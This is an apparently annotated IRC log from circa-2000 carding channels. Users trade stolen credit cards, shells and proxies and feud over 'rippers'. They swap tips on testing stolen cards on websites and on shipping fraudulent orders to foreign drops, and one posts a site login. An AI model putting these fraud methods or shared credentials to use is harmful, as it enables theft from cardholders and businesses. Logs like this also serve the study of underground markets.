      :D1ck :hm
      :J4n3 :is ?
      :D1ck :chalo time mil gaye ga
      
      come we shall get the time
      
      :D1ck :now we can investiagte
      :J4n3 :yeah yeah
      :J4n3 ::)
      :D1ck :(g|nger`): well
      :D1ck :(g|nger`): i have like 20
      :D1ck :(g|nger`): example.org example.org example.com example.net example.com example.com example.org will-fuck-up-example.com example.com example.com example.com example.com example.com
      :D1ck :(g|nger`): plus others
      :D1ck :(g|nger`): you can have whatever vhosts you want
      :D1ck :kewl?
      :m4r1n4ru :Away
      :J4n3 :yeah kewl
      :D1ck :PHAT6
      :D1ck :;pp
      :J4n3 :if we have domains, we can have vhost of whatever we like
      :D1ck :yaar is it possibl that u can help me with wrebpage :P?
      :D1ck :i cant do alone, coz i have 0-webpage skilzl
      :D1ck :hehe
      :J4n3 :yeah yeah i'm with u always
      :J4n3 ::)
      :D1ck :iknowheh
      :J4n3 :dont feel ur self alone
      :D1ck :kool:)
      :D1ck :kleet
      :J4n3 ::)
      :D1ck :aur sunao
      
      so what else is new?
      
      :D1ck :what haWt
      :J4n3 :nutthin hot naveed nay chars maanga hai hehe
      
      nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot)
      
      :D1ck :HAHAHAHAAHAHA
      :J4n3 :hehehe yeah
      :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali?
      
      does he do marijuana? (Note:: something about his girlfriend being involved in marijuana too)
      
      :D1ck :ROFL
      :J4n3 :lol 
      :D1ck ::)
      :D1ck ::)
      :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko
      
      hah. he was having marijuana since the beginning. earlier i had given him some too
      
      :D1ck :lol
      :D1ck :oki
      :D1ck :tum charas latay hoon?
      
      do you also do marijuana?
      
      :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious
      :J4n3 :haan , i have many relations with drug mafia hehe
      :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n");
      :D1ck :lol
      :Flapjack- :Anyone trade cc for bnc? Msg me
      :D1ck :char drugs[80]'
      :D1ck :char drugs[80];
      :J4n3 :hehe
      :J4n3 :lol
      :D1ck ::)
      :J4n3 :main bee peetha hon kabee kabee mood hoay par
      
      i have some depends on the mood
      
      :D1ck :oh
      :D1ck :(@|S4n4m|): wasalamz
      
      salutations
      
      :D1ck :(sawera): w/salam
      :D1ck :chix?
      :D1ck :bawt?
      :J4n3 :yup |S4n4m| = mine
      :D1ck :hahaa
      :D1ck :all-chicks = yure
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay
      
      hey do you want to do some work?
      
      :J4n3 :> thum falsafi kub say ban gayee ?
      
      since when did you become a philosopher?
      
      :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay
      
      since the time i've started talking to you
      
      :J4n3 :aaaaahhhhhhhhhh
      :D1ck :hhaha
      :D1ck ::P
      :D1ck :mv logs.txt bhabi.txt
      
      (Note:: bhabi = sister-in-law)
      
      :J4n3 :lol
      :J4n3 :oye
      :D1ck :<bhab> cat bhabi.txt
      :D1ck :<bhabi> I WILL KILL U D4v3
      :D1ck :?
      :J4n3 :muhahahahahhahahahahhhaa
      :J4n3 :HHAHAHAHAHAHAH
      :D1ck ::)
      :J4n3 :heheheheh
      :J4n3 :ROFLMAO
      :D1ck :(:
      :J4n3 :ROFLMAO
      :D1ck :=P
      :m4r1n4ru :Away
      :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks
      :m4r1n4ru :Away
      :Dariox :who trade cc
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :[Agent] :anyone can card me a laptop?
      :m4r1n4ru :Away
      :m4r1n4ru :Away
      :telnet- :anyone can card me a shell or web domain....pls answer to me
      :m4r1n4ru :Away
      :[Agent] :wanna trade
      
      -=-
      
      Day 13 June 16
      
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ??
      :m4r1n4ru! :Away
      :[4g3nt]! :anyone can tell how to use a company credit card ????
      :m4r1n4ru! :Away
      :TanTouze! :hi goober... oops wrong window
      :Ricky! :if someone would like to xchange cards contact me
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :yo m4r1n4ru, stop it pls
      :Co0lWoRx! :damn it, im tired of all this shit
      :Co0lWoRx! :ok?
      :Ricky! :ii have 2 cards i will trade 
      :Ricky! :i dont go first
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards? (msg me now)
      :AlfonsoD! :im trading too
      :ABA! :msg me AlfonsoD
      :AlfonsoD! :anyone trading?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone trading cards?
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :[4g3nt]! :yo
      :[4g3nt]! :is a master card a 16 digit or 13 ?
      :ABA! :16
      :D4r1u55! :?
      :ABA! :xxxx/xxxx/xxxx/xxxx
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :D4r1u55! :wow
      :D4r1u55! :ABA
      :D4r1u55! :look here
      :D4r1u55! :[10:24] <D4r1u55> Not Approved: Customer information invalid. 
      :D4r1u55! :[10:24] <D4r1u55>      Not Approved: Invalid Credit Card Number. 
      :D4r1u55! :u give me 2 cc's.but are not viabils
      :D4r1u55! :[10:11] <ABA> <ABA> Dick xxxxxxx
      :D4r1u55! :[10:11] <ABA> <ABA> xxx St Example St
      :D4r1u55! :[10:11] <ABA> <ABA> Somewhere US
      :ABA! :I gave you two working CCs
      :ABA! :then
      :ABA! :you try to send me
      :ABA! :some bullshit
      :D4r1u55! :10:11] <ABA> <ABA> 10320
      :D4r1u55! :[10:11] <ABA> <ABA> 06/200x
      :D4r1u55! :[10:11] <ABA> <ABA> Mastercard.
      :D4r1u55! :[10:11] <ABA> <ABA> xxxx xxxx xxxx xxxx
      :D4r1u55! :[10:11] <ABA> .
      :ABA! :1.2meg html file
      :D4r1u55! :[10:11] <ABA> John Salvo
      :ABA! :fucking thief
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :D4r1u55! :[10:11] <ABA> 1175 Example Ave
      :D4r1u55! :[10:11] <ABA> 33146
      :D4r1u55! :[10:11] <ABA> VISA
      :D4r1u55! :10:11] <ABA> VISA
      :D4r1u55! :[10:11] <ABA> 12/200x
      :D4r1u55! :[10:11] <ABA> xxxxxxxxxxxxxxxx
      :D4r1u55! :and that's all
      :ABA! :you lame gimp
      :ABA! :youve got them the wrong way round
      :ABA! :thief
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :m4r1n4ru! :Away
      :D4r1u55! :that two cc's u send to me
      :D4r1u55! :and are'nt good
      :D4r1u55! :dont work
      :D4r1u55! :try to understand
      :D4r1u55! :whatever
      :[4g3nt]! :how can i card a company cc?
      :ABA! :4No one trade with D4r1u55
      :ABA! :4Hes a ripper
      :[4g3nt]! :hihi
      :[4g3nt]! :anyone can tell me how to use a company owned cc??
      :m4r1n4ru! :Away
      :Emy__! :I need some Cc `z (Visa)
      :Emy__! :...
      :ABA! :Anyone want to trade cards, msg me.
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Emy MSG me then
      :m4r1n4ru! :Away
      :D4r1u55! :ACTION plek pa
      :J4n3! :nettlink
      :ABA! :ANYONE want to trade cards?
      :Emy__! :I need some credit cards .... Visa
      :ABA! :Message me then you fucking idiot
      :ABA! :how many more times
      :m4r1n4ru! :Away
      :2red! :ACTION is selling virgin credit cards, /msg me for deal.
      :ABA! :4ANYONE want to trade cards? Msg me
      :ABA! :4ANYONE want to trade cards? Msg me
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :[4g3nt]! :fuck ABA <<< ripper 
      :Emy__! :I need some credit cards .... Visa
      :m4r1n4ru! :Away
      :ABA! :4ANYONE want to trade cards? Msg me
      :ABA! :4ANYONE want to trade cards? Msg me
      :m4r1n4ru! :Away
      :Emy__! :anybody want to give me a cc ??
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :ABA! :Anyone want to trade cards?
      :sunfire! :
      :ABA! :Anyone want to trade cards?
      :m4r1n4ru! :Away
      :m4r1n4ru! :Away
      :connex! :anyone can help me to buy a shell?
      :m4r1n4ru! :Away
      :m4r1n4ru! :I have Returned.
      :m4r1n4ru! :-op
      :sunfire! : :-)
      :|DONNIE|! :ne1 have BNC...i have virgin..
      :|DONNIE|! :lets trade
      :DuXO! :hi to all
      :Razzorz! :anyone have bnc
      :Razzorz! :anyone have bnc?
      :Razzorz! :please tell me about bnc
      :DuKso! :hi anyone alive?
      :2red! :nope
      :DuKso! :how are u 2red :)
      :DuKso! :where are u from?
      :2red! :<- mortie/lita
      :DuKso! :hi man
      :DuKso! ::)
      :DuKso! :what are u doing:)
      :2red! :nothing
      :2red! :just listening to music
      :Nic[EQ]! :ACTION is trading Visas and MCs, looking for more or for shells
      :Emy__! :I need some cc `s (I do not have any )
      :FooDSt4mP! :anybody have any visa's?  i need to get a plane tick for a chick who's being abused by her husband
      :FooDSt4mP! :ill trade shells and dialup accounts for a visa/cc
      :[St0rM]! :hahahah
      :FooDSt4mP! :dude its not funny
      :FooDSt4mP! :its sad
      :FooDSt4mP! :i know it sounds like good bs for a card but its not..
      :MonTs! :what sort of shells?
      :FooDSt4mP! :aragorn.example.net
      :FooDSt4mP! :its a linux box.. rh 6.1... 6 bg's... 250 meg quota...
      :MonTs! :how many BG process?
      :FooDSt4mP! :redundant t3 conn
      :FooDSt4mP! :6 bg's
      :MonTs! :what's the http address?
      :FooDSt4mP! :no http.. its a private shell off a friends companies box
      :FooDSt4mP! :example.net is the isp
      :FooDSt4mP! :aragorn.example.net is the telnet addy
      :FooDSt4mP! :i just need some cc to get a damn ticket for this girl man
      :FooDSt4mP! :msg me if you wanna trade
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade virgin cc's? msg me for fair trade (rippers go away)
      :2red! :pFFt--
      :Neon! :Have some cc...
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :2red! :we hear you
      :2red! :stop it
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :pFFt--! :ACTION any1 wanna trade cc's? msg me for fair trade (rippers go away)
      :kurky! :I need someone to do me a favour....
      :kurky! :ull get a few virgin visa's
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :glipy! :bah
      :glipy! :care-mi zice shi mie un site de un sa cumpar tembelfoane
      :glipy! :hap
      :glipy! :?
      :^W! :ACTION is trading ccz msg me for trade
      :wizz! :hey tabacu
      :TanTouze! :ok I'm here, now what were you saying?
      :NiCeBoY! :ello
      :NiCeBoY! :wers coolworx?
      :Mendoza! :hey . Ibill is  cardable?
      :DuXo! :hi to all
      :DuXo! :how are we today
      :NiCeBoY! :ello duxo
      :ABA! :Anyone want to trade cards? MSG me
      :DuXo! :npn msg me 
      :ABA! :Anyone want to trade cards? MSG me
      :NiCeBoY! :
      :DuXo! :any trade cc
      :ABA! :Anyone want to trade?
      :DuXo! :me :)
      :ABA! :heh
      :ABA! :again?
      :DuXo! ::))
      :DuXo! :yes but do u have with the phone number too?
      :lkd1! :i have
      :ABA! :no, just make one up innit :P
      :DuXo! :lkd1 :)
      :DuXo! :ripper:)
      :DuXo! :he just leave the channel :))
      :ABA! :ripper?
      :DuXo! ::)
      :ABA! :I just traded wif him :P
      :DuXo! :aND?
      :DuXo! ::)
      :DuXo! :he gaved u valid?
      :DuXo! :i haven`t trade..
      :ABA! :I verified
      :DuXo! :but he don`t wanted to trade with me .....
      :ABA! :before I gave him #
      :DuXo! :becasue he thinked...
      :DuXo! :im ripper 
      :2red! :duxo :P
      :DuXo! :with +v
      :ABA! :heh
      :ABA! :ive been ripped so many bloody times
      :ABA! :if they dont give me first
      :ABA! :I dont trade ever
      :DuXo! :ok....
      :ABA! :cos ive been ripped so many times
      :ABA! :about 10 times wif cards
      :ABA! :3 shells
      :ABA! :etc
      :2red! :tss
      :2red! :is that supposed to be something?
      :2red! :i got ripped off 40 virgins in one deal once
      :ABA! :40 virgins what?
      :2red! :40 virgin cards
      :ABA! :Drake``: Trade?
      :ABA! :ic
      :ABA! :and when some little foreign pissant lamer
      :ABA! :steals from you
      :Drake``! :trade what?
      :ABA! :then runs off
      :ABA! :Drake``: Cards
      :ABA! :it makes you wanna bloody cry
      :ABA! :and beat your comp
      :ABA! :innit
      :2red! :where are you from npn, romania?
      :ABA! :no uk
      :2red! :ok
      :2red! :sweden here
      :ABA! :england
      :2red! :interested in UK virgins?
      :ABA! :leet
      :ABA! :hmmm
      :ABA! :yup
      :2red! :i got plenty of international virgins
      :2red! :and US ofcourse
      :ABA! :quick tho
      :ABA! :cos i gtg real soon
      :2red! :err?
      :2red! :quick though what
      :ABA! :trade quick
      :ABA! :get on wif it
      :ABA! :cos i gtg
      :2red! :why would i trade virgins?
      :ABA! :no
      :ABA! :like i gib you summat else
      :2red! :hehe
      :2red! :i sell cards dear.
      :ABA! :oh dear
      :ABA! :so
      :ABA! :what do you want for it
      :2red! :money
      :ABA! :how much?
      :2red! :depends on how many you want
      :ABA! :10
      :2red! :100 dollars
      :ABA! :fuck me
      :2red! :?
      :ABA! :(please)
      :ABA! :i aint got 100$s
      :2red! :thats what it costs
      :2red! :thats how it is :)
      :hhkrgb! :romania anyone?
      :Bl4ck_! :yes
      :ABA! :0mg
      :ABA! :I dont fucking believe this
      :ABA! :that fool
      :ABA! :DuXo just ripped my card
      :ABA! :and ran
      :2red! :you surprised or something?
      :ABA! :erm
      :ABA! :yes
      :ABA! :hes an op
      :2red! :so?
      :ABA! :and ops dont do that kind of shit
      :ABA! :ive been trading here
      :ABA! :for about 
      :ABA! :6 months
      :ABA! :and no ops ever done that shit
      :2red! :thats interesting
      :2red! :cause i havent seen you areound much before
      :ABA! :Ive never seen you either
      :m4r1n4ru! :ABA can you send me a log man ?
      :2red! :my usual nick is mortie or lita
      :ABA! :m4r1n4ru yea, when I get back
      :ABA! :2red: ive seen the nick lita
      :ABA! :ages ago
      :m4r1n4ru! :ok send me log please
      :ABA! :I need dinner
      :t4b4cu! :huh
      :2red! :duxo
      :Piano2! :what?
      :t4b4cu! :so taht's lita
      :DuXo! :it`s me..
      :Bl4ck_! :t4b4cu?
      :2red! :im lita yeah
      :t4b4cu! :always changing nicks
      :t4b4cu! :hhe
      :DuXo! :i know..
      :Bl4ck_! ::>>
      :2red! :doesnt matter since i dont trade
      :2red! :i just watch you ppl
      :DuXo! :hm
      :2red! :and obviously an op just ripped?
      :DuXo! :npn
      :DuXo! :man
      :DuXo! :m4r1n4ru
      :DuXo! :i haven`t rip him up
      :2red! :what happened then?
      :DuXo! :man
      :DuXo! :he gaved me CCs
      :m4r1n4ru! :ya
      :m4r1n4ru! :what ?
      :DuXo! :2
      :DuXo! :and the both where invalid
      :DuXo! :we tradeed 340 minutes before
      :t4b4cu! :?
      :DuXo! :we tradeed 30 minutes before
      :DuXo! :he gaved me valid
      :t4b4cu! :who ripped?
      :DuXo! :and i gaved him valid CC
      :DuXo! :man
      :DuXo! :becuase i haved +v
      :t4b4cu! :who ripped?
      :t4b4cu! :i ban anyone who ripps
      :t4b4cu! :so ....i'd like to know
      :DuXo! :i checked the 2 ccs on www.come.to/tdnga
      :DuXo! :the first 2 sex banners..
      :DuXo! :i used the first one
      :DuXo! :and the CC comed out decliened
      :DuXo! :after that 
      :DuXo! :i checked the CC on www.bonzi.com
      :DuXo! :on Internet Boost
      :DuXo! :the first one come out and send me Invalid Card...
      :DuXo! :and another that the card is not valid anymore...
      :DuXo! :tabacu are u here??
      :2red! :oh well
      :2red! :you kids
      :2red! :i never understood the point of trading cards anyway
      :t4b4cu! :ahhahaah
      :t4b4cu! :looolz
      :t4b4cu! :us kids?
      :DuXo! :LoL
      :t4b4cu! :how old are u my dear?
      :2red! :im 20
      :2red! :why
      :DuXo! :so
      :t4b4cu! :lolz
      :DuXo! :what will happen?
      :t4b4cu! :i'm 20 too
      :DuXo! :u know that im a Legit one 
      :DuXo! :i can prove that man..
      :DuXo! :i have never ripped a man
      :t4b4cu! :most ppl areound here are about that age
      :2red! :i dont see anyone in here as legit
      :t4b4cu! :ahhah
      :t4b4cu! :what about me?
      :2red! :why would i see you as legit?
      :t4b4cu! :i have more ccs than anyone here
      :t4b4cu! :heh
      :2red! :and how many is that?
      :t4b4cu! :and i never ripped in my life
      :t4b4cu! :about 40.000
      :2red! :is it just me or could anyone say that?
      :t4b4cu! :anyway....i more hacker than carder
      :2red! :same here
      :t4b4cu! :that's why i could take this chan over
      :t4b4cu! :eheh
      :t4b4cu! :with my friends
      :hhkrgb! :join/romania
      :2red! :taking over a channel doesnt really require any skills.
      :hhkrgb! :wops
      :t4b4cu! :we flooded from oc48
      :t4b4cu! :heh
      :t4b4cu! :lolz
      :t4b4cu! :it does
      :2red! :packeting is for kids
      :t4b4cu! ::)
      :DuXo! :tabacu
      :DuXo! :is everthing ok now?
      :t4b4cu! :yeh it is
      :DuXo! :ok..
      :m4r1n4ru! :hhm
      :DuXo! :what?
      :m4r1n4ru! :so he ripped or not ?
      :DuXo! :no man..
      :DuXo! :i telled u i checked the cc
      :DuXo! :where is he 
      :DuXo! :i will talk with him
      :DuXo! :and check the CCs again
      :DuXo! :and give to the channel
      :m4r1n4ru! :ok
      :DuXo! :i don`t have the logs....
      :DuXo! :to prove right now..
      :hhkrgb
      :co^digigi! :hekss
      :co^digigi! :heks...
      :co^digigi! :i have a shell...and wanna trade with calling card
      :co^digigi! :serious person msg me 
      :DuXo! :cool
      :Co0lWoRx! :yo
      :DuXo! :let`s got to work
      :DuXo! :gety
      :DuXo! :get
      :DuXo! :and try that .
      :Co0lWoRx! :damn it
      :DuXo! :what the fuck is this :)
      :seriuscar! :what did you have in mind about tradi
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :Drake``! :co^digigi left after ripping me
      :Drake``! :hehehe
      :Co0lWoRx! :yo drake
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :seriuscar! :have bnc, proxies and shell....msg me if want to trade
      :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site
      :taur! :salut
      :taur! :astia tac si fac
      :ows
      :ows
      :ows
      :MonTs! :howdy folks?
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya
      :iDoetS! :gollllllllllllll
      :iDoetS! :1 more
      :MonTs! :1 more for whom?
      :iDoetS! :ceko
      :m4r1n4ru! :-join #rocarding
      :m4r1n4ru! :-save
      :xKurko! :can anyone gimme one fast proxy???
      :m4r1n4ru! :-op
      :|AmDeAtH! :-op 
      :|AmDeAtH! :lol hehe
      :Reaggyman! :Do sombody now what the program ares do?
      :Reaggyman! :whats ares?
      :trinix! :sup all?
      :Reaggyman! :trinix: do you now what ares is
      :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht?
      :trinix! :caught?
      :trinix! :no
      :trinix! :sultrix says u guys are the ones to ask
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :trinix! :nope
      :Reaggyman! :are you new here?
      :trinix! :yeah
      :Reaggyman! :me to
      :Reaggyman! :nowbody answers
      :trinix! :I am from uk
      :Reaggyman! :Norway
      :trinix! :I need help on how to order to my house with out getting caught
      :trinix! :using cc
      :Reaggyman! :What?
      :Reaggyman! :Order What?
      :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk
      :Reaggyman! :isent that easy?
      :trinix! :hmm not sure
      :trinix! :I wanna an abandoned house but can't find any
      :Reaggyman! :I dont now
      :Reaggyman! :i came here to
      :Reaggyman! :i need a cracking program
      :trinix! :why dun you just go to www.xxxpassowrds.com
      :glipy! :what cracking program
      :Reaggyman! :i dont think they got THAT kind of passwords
      :Reaggyman! :The name is Ares
      :Reaggyman! :Hi sultrix
      :trinix! :heya man
      :Reaggyman! :i was band for xxxpasswords
      :Sultrix! :Hello
      :Sultrix! ::-(
      :Reaggyman! :Can you help me sultriz
      :Reaggyman! :x
      :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ?
      :Sultrix! :Reaggyman: Sure whatsup ?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm
      :Sultrix! :hmm
      :Sultrix! :no idea
      :Reaggyman! :Monts: whats that?
      :MonTs! :go there and have a look
      :Reaggyman! :and this is 
      :Reaggyman! :password?
      :Reaggyman! :Hi tauer
      :Tauer! :hi
      :Reaggyman! :can you help me?
      :Reaggyman! :Do you now a program that cracks sex(enter)password?
      :astavista! :lol
      :trinix! :shit can anyone slide me some tips?
      :tauer! :mai 
      :tauer! :asa ceva mai greu
      :trinix! :shit can anyone slide me some tips?
      :Reaggyman! :tauer what+
      :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta
      :trinix! :wtf
      :tauer! :sau potzi s-a te inregistrezi cu un card
      :Reaggyman! :English plis
      :tauer! :lol
      :tauer! :u can go to a site thwt give u password
      :tauer! :sheet
      :tauer! :sorry
      :trinix! :wtf
      :tauer! :anibody spek romanian?
      :trinix! :shit can anyone give me some tips?
      :tauer! :what kind of tips?
      :tauer! :trinix?
      :Sultrix! :in credit card fraud he means
      :tauer! :lol
      :tauer! :what i am thinking....:)
      :Sultrix! :heh
      :tauer! :the chanel carding
      :trinix! :I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :tauer! :is hard to someone to teel u about theat
      :tauer! :in uk?
      :tauer! :is verry hard
      :trinix! :what?
      :tauer! :but u can sendit to me in other country
      :trinix! :is hard to someone to teel u about theat <------------ what?
      :tauer! :and i can sendit to u
      :trinix! :nah
      :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught?
      :xKurko! :I offered that and Im in the UK with a different drop than my house
      :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house
      :tauer! :i dont write to well in enghlish
      :trinix! :any tips?
      :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me
      :tauer! ::)
      :trinix! :nah take to long
      :tauer! :lol
      :tauer! :is my turn?
      :trinix! :besides you might keep it
      :tauer! :to ping time out?
      :tauer! :food weaponds?
      :tauer! :flood
      :trinix! :wb bro
      :Sultrix! :ta 
      :Sultrix! :wassup bra
      :trinix! :nadda
      :trinix! :reading up on some shit
      :Sultrix! :cool
      :Sultrix! :Has anyone here got any WORKING CC numbers ?
      :tauer! :i sell vodoo 3 3000 100$
      :tauer! :whith id
      :tauer! ::)
      :damang! :need some fresh cc
      :Sultrix! :me too
      :YesIAm! :haha
      :trinix! :me too
      :Sultrix! :Anyone got any cc numbers that work
      :trinix! :answer him god damn it
      :YesIAm! :my cc number works 
      :fus10nx! :nope...
      :YesIAm! ::)
      :CC-Master! :who trade here?
      :fus10nx! :not U
      :fus10nx! :Not I
      :trinix! :fus10nx yeah....
      :CC-Master! :?
      :CC-Master! :so 
      :CC-Master! :anyone for trade round here?
      :damang! :shells for fresh cc
      :CC-Master! :what shels or ccz?
      :damang! :i have shelz
      :Sultrix! :Does anyone have any CC's ??
      :CC-Master! :ye
      :CC-Master! :i have 
      :CC-Master! :so?
      :Sultrix! :that i can have
      :YesIAm! :hahaahaha
      :Sultrix! :ffs
      :damang! :need some fresh cc
      :Sultrix! :Can nayone dish some ccs my wya pease
      :YesIAm! :If somebody wanted to donate a # he would paste it into the chan
      :damang! :i have shelz wana trade w/ cc
      :BONI! :hi anyone for trade?
      :YesIAm! :<CC-Master> anyone for trade round here?
      :BONI! :?
      :BONI! :so>?
      :rgers! :hi boni
      :rgers! :how are u?
      :rgers! ::))
      :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells
      :Papa-tudo! :anyone trade bncs with vhosts?
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :Papa-tudo! :ACTION trading bncs with vhosts
      :ureche! :re
      :_Mephisto! :re
      :_Mephisto! :cine pizda masii a pus topicul ala idiot?
      :SIZIF! :enybody have cc?
      :Bl4ck_! :t4b4cu
      :ucok! :hai
      :Bl4ck_! :salut
      :ucok! :
      :ucok! :xeexxexeexxeeeexe
      :t4b4cu! :salut
      :dlotos33! :is there anyone from MACEDONIA?
      :SIZIF! :yep
      :blazo99! :what's the problem duds
      :FanTom! :some one wots to trade
      :GoDsHaNd! :can someone help me?
      :blazo99! :what's the problem
      :GoDsHaNd! :blazo99
      :GoDsHaNd! :ej
      :GoDsHaNd
      :Pinu\away! :hi
      :t4b4cu! :c
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :Bl4ck_! :m4r1n4ru
      :m4r1n4ru! :marca ma
      :Co0lWoRx! :7me any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
      :Bl4ck_! :de ce am ban pe #rocarding?
      :Bl4ck_! :Co0lWoRx :PP
      :m4r1n4ru! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :?
      :Co0lWoRx! :???
      :Bl4ck_! :Co0lWoRx I used to have +v in here
      :Bl4ck_! ::>>
      :Co0lWoRx! :well, y u loose it?
      :Bl4ck_! :dunno
      :Bl4ck_! :never minds
      :Bl4ck_! ::>>
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :look at this shit ppl
      :Co0lWoRx! :<SIZIF> do u have cc's?
      :Co0lWoRx! :<Co0lWoRx> hmmm, yes, a lot
      :Co0lWoRx! :<SIZIF> would u like to send me just one?
      :Co0lWoRx! :<Co0lWoRx> hahahaha, go away pls lamer
      :SIZIF! :enybody have cc?
      :Co0lWoRx! :ure banned man, bye
      :SIZIF! :IZIF> <SIZIF> succker <Co0lWoRx
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :dlotos33! :GoDsHaNd IS RIPPER
      :Co0lWoRx! :ok ok
      :yourlife! :k
      :Co0lWoRx! :w8
      :GoDsHaNd! :no i'm not
      :_Mephisto! :he is right
      :GoDsHaNd! :he want to gave CC which doesn't work
      :GoDsHaNd! :i sad to him to gave me to check fhirst
      :GoDsHaNd! :i'm not RIPPER
      :yourlife! :proove it ,,,
      :GoDsHaNd! :how?
      :_Mephisto! :give to all a good card
      :GoDsHaNd! :ahahahahahahahaa
      :GoDsHaNd! :you r crazy
      :DuXo! :hi too all
      :DuXo! :how are we today
      :yourlife! :who win football ? danmark or holland ? 
      :Co0lWoRx! :holland
      :DuXo! :Holland :)
      :DuXo! :3:0
      :_Mephisto! :3-0
      :_Mephisto! :hey what do you think of romania?
      :DuXo! :has been storm around?
      :Co0lWoRx! :nope
      :yourlife! :tomorrow will be a great match 
      :DuXo! :yes
      :yourlife! :Ger-Eng
      :DuXo! :Germany  - England
      :DuXo! :..
      :yourlife! :very big battle 
      :DuXo! :anyone here from Europe and wanna Chat ???
      :Co0lWoRx! :me...
      :DuXo! ::))
      :DuXo! :i already know u cool:)
      :DuXo! :anyone see Playboy?
      :Co0lWoRx! :hmmmmmmm, ok
      :Co0lWoRx! :i want playboy
      :DuXo! ::)
      :DuXo! :LoL
      :Co0lWoRx! :yo duxo, go card a membership at www.playboy.com
      :DuXo! :why?
      :DuXo! ::))
      :Co0lWoRx! :so we can use it, go pls
      :Co0lWoRx! :for me....
      :Clasher! :Sorry to bother, but, does anyone have a spare card?
      :Co0lWoRx! :=o)
      :DuXo! ::)
      :DuXo! ::)
      :dlotos33! :Enyone is from ROMANIA?
      :DuXo! :
      :DuXo! :
      :DuXo! :go 
      :DuXo! :see some girls
      :DuXo! :www.playboy.com
      :DuXo! :username : duxoboy16
      :Bl4ck__! :lolz
      :DuXo! :pass : dukovski16]
      :DuXo! :pass : dukovski16
      :DuXo! :pass : dukovski16
      :DuXo! :don`t see the fucking pc all the day
      :Co0lWoRx! :no man
